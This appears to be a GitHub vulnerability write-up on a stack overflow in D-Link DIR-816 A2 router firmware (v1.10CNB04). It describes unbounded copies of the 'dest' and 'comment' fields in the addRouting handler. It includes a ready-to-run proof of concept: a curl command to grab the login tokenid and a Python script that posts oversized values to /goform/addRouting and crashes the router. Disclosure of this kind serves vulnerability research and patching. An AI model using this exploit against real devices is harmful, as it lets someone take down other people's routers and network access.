Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

D-link DIR-816 A2_v1.10CNB04.img Stack overflow vulnerability

Firmware information

Affected version

The picture above shows the latest firmware for this version

Vulnerability details

As can be seen from the above figure, when the hostnet is net, dest will be copied to v14. It is worth noting that the size is not limited, which leads to stack overflow.

At the same time, there is another place below this function that can cause stack overflow. As shown in the figure above, the control v18 is the comment, and v18 will be added to v16. There is no size limit, which will lead to stack overflow.

Poc

We need to get the tokenid first

curl http://192.168.0.1/dir_login.asp | grep tokenid

接着构造以下poc即可

import requests

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

tokenid = 'xxx'

url = 'http://192.168.0.1/goform/addRouting'

data = {
    'tokenid' : tokenid,
    'dest' : 'a' * 10000, 
    'hostnet' : 'net',
    'netmask' : '255.255.255.0',
    'gateway' : '192.168.0.1',
    'interface' : 'LAN',
    'custom_interface' : 'br0',
    'comment' : 'a' * 10000

}
response = requests.post(url, data=data)
response.encoding="utf-8"
info = response.text
li(url)
print(info)

final router crash